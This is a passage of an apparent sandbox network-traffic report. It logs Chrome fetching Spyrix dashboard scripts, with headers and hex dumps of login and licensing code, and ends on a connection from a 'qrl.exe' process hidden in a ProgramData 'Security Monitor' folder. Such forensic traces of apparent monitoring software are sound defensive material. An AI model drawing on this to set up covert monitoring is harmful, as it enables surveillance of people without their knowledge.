                                                                                                                                                                                                                                                          ETag: "66fa817d-bf9"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:28:26+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc233
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC3065INData Raw: 2e 2d 7a 74 52 79 53 4e 68 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 66 69 74 2d 63 6f 6e 74 65 6e 74 7d 2e 46 74 74 30 43 70 57 51 7b 77 69 64 74 68 3a 32 30 30 70 78 7d 2e 5f 34 61 49 38 41 71 43 48 7b 6f 70 61 63 69 74 79 3a 2e 35 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 57 6e 4e 6f 78 4b 4b 48 7b 77 69 64 74 68 3a 31 30 30 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 33 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 69 6e 70 75 74 2d 62 6f 72 64 65 72 29
                                                                                                                                                                                                                                                          Data Ascii: .-ztRySNh{display:flex;position:relative;flex-direction:column;height:fit-content}.Ftt0CpWQ{width:200px}._4aI8AqCH{opacity:.5;pointer-events:none}.WnNoxKKH{width:100%;font-size:15px;padding:10px 13px;border-radius:10px;border:1px solid var(--input-border)


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          26192.168.2.75503695.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC626OUTGET /dashboard30/assets/en-5393c481.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC390INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1098
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-44a"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:40+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC1098INData Raw: 63 6f 6e 73 74 20 6f 3d 22 63 6f 6e 76 65 6e 69 65 6e 74 22 2c 65 3d 22 4d 61 69 6e 22 2c 6e 3d 7b 22 54 68 65 20 6c 69 63 65 6e 73 65 20 70 65 72 69 6f 64 20 68 61 73 20 65 78 70 69 72 65 64 22 3a 22 54 68 65 20 6c 69 63 65 6e 73 65 20 70 65 72 69 6f 64 20 68 61 73 20 65 78 70 69 72 65 64 22 2c 22 54 68 65 20 74 72 69 61 6c 20 70 65 72 69 6f 64 20 69 73 20 65 78 70 69 72 65 64 22 3a 22 54 68 65 20 74 72 69 61 6c 20 70 65 72 69 6f 64 20 69 73 20 65 78 70 69 72 65 64 22 2c 22 59 6f 75 72 20 64 61 74 61 20 69 73 20 73 61 66 65 22 3a 22 59 6f 75 72 20 64 61 74 61 20 69 73 20 73 61 66 65 22 2c 22 50 6c 65 61 73 65 20 70 75 72 63 68 61 73 65 20 61 20 6c 69 63 65 6e 73 65 20 74 6f 20 61 63 63 65 73 73 20 79 6f 75 72 20 64 61 74 61 22 3a 22 50 6c 65 61 73 65 20
                                                                                                                                                                                                                                                          Data Ascii: const o="convenient",e="Main",n={"The license period has expired":"The license period has expired","The trial period is expired":"The trial period is expired","Your data is safe":"Your data is safe","Please purchase a license to access your data":"Please


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          27192.168.2.75502895.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC376OUTGET /dashboard30/assets/en-08b2a987.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC341INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: W/"66fa817d-69c5"
                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:37:44+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc71
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC3755INData Raw: 31 63 37 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 9d e9 6e dc 56 96 c7 bf cf 53 70 88 00 76 80 6b 61 d2 dd 98 1e b0 21 0c bc 24 8e 3b de e2 25 ee 04 03 a4 a9 2a 96 c4 36 8b ac 90 2c c9 4a 90 07 9a d7 98 27 9b df ff dc 7b 49 d6 22 c9 4b e2 76 3a fe 22 f1 ee db d9 cf b9 b7 66 4d dd f5 49 71 98 de 5c f7 cd aa ca cf 53 d7 1c a6 4f 8a bc 6b ea d4 f5 87 e9 9d a2 9b b5 e5 aa 2f 95 ce 0f d3 a7 7d de af bb d4 95 7c ce da a2 a8 bb 93 a6 4f 5d 7d 98 3e ea 4f 8a 36 75 dd 61 fa bc d3 47 4b a7 ab 55 45 8f 33 b2 ea 97 75 73 46 17 d5 61 7a ab 6d ce ac c6 fc 30 bd 5d 95 ab a3 26 6f e7 a9 5b 1f a6 2f 8a a3 59 be 4c dd ca c6 69 e9 f7 fc 30 fd fc 55 c9 c7 f2 30 fd a6 9c 17 4d 5b cc 52 77 42 79 b3 ae e7 96 38 f6 e3 94 b3 dc 4f 72 71 98 3e 2b fb aa 48 dd a9 fa 6f 3a be ce 0e
                                                                                                                                                                                                                                                          Data Ascii: 1c75nVSpvka!$;%*6,J'{I"Kv:"fMIq\SOk/}|O]}>O6uaGKUE3usFazm0]&o[/YLi0U0M[RwBy8Orq>+Ho:
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC3538INData Raw: 1f e1 3d 79 ad 46 3e 10 69 3e 88 0b bd 82 12 c2 c6 36 f5 18 b7 f2 66 8d a4 f0 12 a9 89 98 a7 d0 98 ae 0b 01 86 7b 32 11 68 2c d0 3b 43 2c a9 cd ad bd e5 16 bf b4 78 6c fd 90 b5 8c e0 c1 26 c4 76 5b 05 66 be 5f 15 84 a0 87 30 07 f9 5b 8c 24 9b e9 48 4c 1a 0f c4 65 15 8c 2a a1 2b b2 93 d8 5e 16 72 d9 c8 d3 0e 6a fb 1e 7c 5c 47 d8 c2 68 73 7a 66 ea e5 1b 34 c1 b0 1d 6d 78 59 29 35 db 9b c4 46 25 4e 76 50 26 bb 3f 7f 4f fd 05 34 c7 02 03 77 5a 84 12 cc 3c 04 b9 d4 85 b3 a0 e6 0c 47 c3 a0 88 5e 85 37 c1 33 f1 0e 98 77 51 0f 90 1d f3 49 d0 b5 87 26 ed 73 0c f1 bb b0 c8 0e 39 c8 78 db 5e 18 7f c0 17 15 0a ad 7c b0 fc b0 d3 1e a3 76 32 6d 8c 51 39 84 1e 07 3a e4 07 d8 5b a2 18 82 89 ce 69 aa 0f 50 0f fc d0 e8 c2 22 1f 9d 20 78 f3 e2 85 22 13 62 ca f9 b0 f3 ac 2d
                                                                                                                                                                                                                                                          Data Ascii: =yF>i>6f{2h,;C,xl&v[f_0[$HLe*+^rj|\Ghszf4mxY)5F%NvP&?O4wZ<G^73wQI&s9x^|v2mQ9:[iP" x"b-
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          28192.168.2.75503595.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC554OUTGET /dashboard30/assets/index-1178777c.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC392INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 5163
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-142b"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T12:14:37+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC3704INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 46 2c 6f 20 61 73 20 49 2c 62 20 61 73 20 44 2c 69 20 61 73 20 50 2c 72 20 61 73 20 67 74 2c 6e 20 61 73 20 72 2c 75 20 61 73 20 74 2c 61 75 20 61 73 20 70 74 2c 67 20 61 73 20 48 2c 45 20 61 73 20 5f 74 2c 46 20 61 73 20 66 74 2c 24 20 61 73 20 76 74 2c 44 20 61 73 20 45 74 2c 4d 20 61 73 20 75 2c 63 20 61 73 20 77 2c 70 20 61 73 20 78 2c 52 20 61 73 20 79 2c 73 20 61 73 20 68 74 2c 61 74 20 61 73 20 77 74 2c 68 20 61 73 20 73 2c 79 20 61 73 20 64 2c 61 7a 20 61 73 20 78 74 2c 61 6d 20 61 73 20 79 74 2c 65 20 61 73 20 53 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 61 20 61 73 20 57 2c 75 20 61 73 20 4c 74 2c 62 20 61 73 20 50 74 2c 64 20 61 73 20 42 74 7d 66
                                                                                                                                                                                                                                                          Data Ascii: import{d as F,o as I,b as D,i as P,r as gt,n as r,u as t,au as pt,g as H,E as _t,F as ft,$ as vt,D as Et,M as u,c as w,p as x,R as y,s as ht,at as wt,h as s,y as d,az as xt,am as yt,e as St}from"./index-004f4025.js";import{a as W,u as Lt,b as Pt,d as Bt}f
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC1459INData Raw: 6c 2c 38 2c 5b 22 74 65 78 74 22 5d 29 5d 29 2c 5f 3a 31 7d 29 5d 2c 32 29 2c 50 28 22 66 6f 72 6d 22 2c 7b 63 6c 61 73 73 3a 72 28 5b 74 28 69 29 2e 63 6f 6e 74 65 6e 74 5d 29 2c 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 66 6f 72 6d 22 2c 6f 6e 4b 65 79 70 72 65 73 73 3a 78 74 28 47 2c 5b 22 65 6e 74 65 72 22 5d 29 7d 2c 5b 73 28 71 2c 7b 63 6c 61 73 73 3a 72 28 5b 74 28 69 29 2e 69 6e 70 75 74 5d 29 2c 76 61 6c 75 65 3a 74 28 67 29 2c 76 61 72 69 61 6e 74 3a 72 74 2e 76 61 6c 75 65 2c 22 61 64 64 69 74 69 6f 6e 61 6c 2d 6d 65 73 73 61 67 65 22 3a 74 28 52 29 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 74 28 61 29 28 22 45 6d 61 69 6c 22 29 2c 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 65 6d 61 69 6c 22 2c 6f 6e 4f 6e 43 68 61 6e 67 65 3a 51 7d 2c 6e 75
                                                                                                                                                                                                                                                          Data Ascii: l,8,["text"])]),_:1})],2),P("form",{class:r([t(i).content]),"data-testid":"form",onKeypress:xt(G,["enter"])},[s(q,{class:r([t(i).input]),value:t(g),variant:rt.value,"additional-message":t(R),placeholder:t(a)("Email"),"data-testid":"email",onOnChange:Q},nu


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          29192.168.2.75503095.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC626OUTGET /dashboard30/assets/en-ef960fb7.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 774
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-306"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:02:54+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC774INData Raw: 63 6f 6e 73 74 20 65 3d 22 52 65 67 69 73 74 65 72 22 2c 6f 3d 22 45 6d 61 69 6c 22 2c 74 3d 22 50 61 73 73 77 6f 72 64 22 2c 73 3d 22 4c 6f 67 69 6e 22 2c 61 3d 7b 22 57 65 6c 63 6f 6d 65 20 42 61 63 6b 22 3a 22 57 65 6c 63 6f 6d 65 20 42 61 63 6b 22 2c 22 53 69 67 6e 20 49 6e 20 77 69 74 68 20 45 6d 61 69 6c 22 3a 22 53 69 67 6e 20 49 6e 20 77 69 74 68 20 45 6d 61 69 6c 22 2c 22 4e 6f 20 61 63 63 6f 75 6e 74 3f 22 3a 22 4e 6f 20 61 63 63 6f 75 6e 74 3f 22 2c 52 65 67 69 73 74 65 72 3a 65 2c 45 6d 61 69 6c 3a 6f 2c 50 61 73 73 77 6f 72 64 3a 74 2c 4c 6f 67 69 6e 3a 73 2c 22 46 6f 72 67 6f 74 20 70 61 73 73 77 6f 72 64 3f 22 3a 22 46 6f 72 67 6f 74 20 70 61 73 73 77 6f 72 64 3f 22 2c 22 54 68 69 73 20 65 6d 61 69 6c 20 63 61 6e 6e 6f 74 20 62 65 20 75 73
                                                                                                                                                                                                                                                          Data Ascii: const e="Register",o="Email",t="Password",s="Login",a={"Welcome Back":"Welcome Back","Sign In with Email":"Sign In with Email","No account?":"No account?",Register:e,Email:o,Password:t,Login:s,"Forgot password?":"Forgot password?","This email cannot be us


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          30192.168.2.75503295.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC573OUTGET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC390INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 4589
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-11ed"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:11:48+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc71
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC3706INData Raw: 69 6d 70 6f 72 74 7b 4a 20 61 73 20 54 2c 24 20 61 73 20 4c 2c 46 20 61 73 20 79 2c 61 47 20 61 73 20 5f 2c 45 20 61 73 20 77 2c 61 4d 20 61 73 20 62 2c 61 41 20 61 73 20 52 2c 63 20 61 73 20 43 2c 70 20 61 73 20 46 2c 61 74 20 61 73 20 63 2c 52 20 61 73 20 4d 2c 61 76 20 61 73 20 66 2c 61 75 20 61 73 20 53 2c 61 77 20 61 73 20 75 2c 61 78 20 61 73 20 68 2c 61 63 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 6c 74 28 29 7b 76 61 72 20 70 3b 63 6f 6e 73 74 20 74 3d 54 28 29 2c 65 3d 4c 28 29 2c 72 3d 79 28 29 2c 61 3d 5f 28 29 2c 7b 73 65 74 44 65 66 61 75 6c 74 73 3a 6f 7d 3d 77 28 29 2c 73 3d 28 28 70 3d 72 2e 70 72 6f 67 72 61 6d 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 70
                                                                                                                                                                                                                                                          Data Ascii: import{J as T,$ as L,F as y,aG as _,E as w,aM as b,aA as R,c as C,p as F,at as c,R as M,av as f,au as S,aw as u,ax as h,ac as N}from"./index-004f4025.js";function lt(){var p;const t=T(),e=L(),r=y(),a=_(),{setDefaults:o}=w(),s=((p=r.program)==null?void 0:p
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC883INData Raw: 69 66 69 63 61 74 69 6f 6e 50 68 6f 6e 65 43 61 6c 6c 22 2c 7b 73 74 61 74 65 3a 28 29 3d 3e 28 7b 66 65 74 63 68 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 3a 7b 2e 2e 2e 75 7d 2c 63 68 65 63 6b 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 3a 7b 2e 2e 2e 75 7d 7d 29 2c 67 65 74 74 65 72 73 3a 7b 66 65 74 63 68 53 74 61 74 65 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 65 74 63 68 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 2e 73 74 61 74 65 7d 2c 66 65 74 63 68 45 72 72 6f 72 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 65 74 63 68 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 2e 65 72 72 6f 72 7d 2c 63 68 65 63 6b 53 74 61 74 65 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 63 68 65 63 6b 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 2e 73 74 61 74 65 7d 7d 2c 61
                                                                                                                                                                                                                                                          Data Ascii: ificationPhoneCall",{state:()=>({fetchPhoneCallStatus:{...u},checkPhoneCallStatus:{...u}}),getters:{fetchState(t){return t.fetchPhoneCallStatus.state},fetchError(t){return t.fetchPhoneCallStatus.error},checkState(t){return t.checkPhoneCallStatus.state}},a


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          31192.168.2.75503395.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC589OUTGET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:28 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 613
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-265"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:13:07+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:28 UTC613INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 70 2c 63 20 61 73 20 72 2c 61 20 61 73 20 65 2c 6f 20 61 73 20 74 2c 62 20 61 73 20 63 2c 74 20 61 73 20 75 2c 6e 20 61 73 20 6c 2c 65 20 61 73 20 66 2c 55 20 61 73 20 64 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 6b 3d 70 28 7b 5f 5f 6e 61 6d 65 3a 22 54 65 78 74 22 2c 70 72 6f 70 73 3a 7b 6f 6e 65 52 6f 77 3a 7b 74 79 70 65 3a 42 6f 6f 6c 65 61 6e 2c 64 65 66 61 75 6c 74 3a 21 31 7d 2c 62 6f 6c 64 3a 7b 74 79 70 65 3a 42 6f 6f 6c 65 61 6e 2c 64 65 66 61 75 6c 74 3a 21 31 7d 2c 74 65 78 74 3a 7b 7d 2c 73 69 7a 65 3a 7b 64 65 66 61 75 6c 74 3a 22 73 6d 22 7d 2c 63 6f 6c 6f 72 3a 7b 64 65 66 61 75 6c 74 3a 22 64 65 66 61 75 6c 74 22 7d 2c 75 70 70 65 72 63 61 73 65
                                                                                                                                                                                                                                                          Data Ascii: import{d as p,c as r,a as e,o as t,b as c,t as u,n as l,e as f,U as d}from"./index-004f4025.js";const k=p({__name:"Text",props:{oneRow:{type:Boolean,default:!1},bold:{type:Boolean,default:!1},text:{},size:{default:"sm"},color:{default:"default"},uppercase


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          32192.168.2.755042158.69.117.1194437324C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
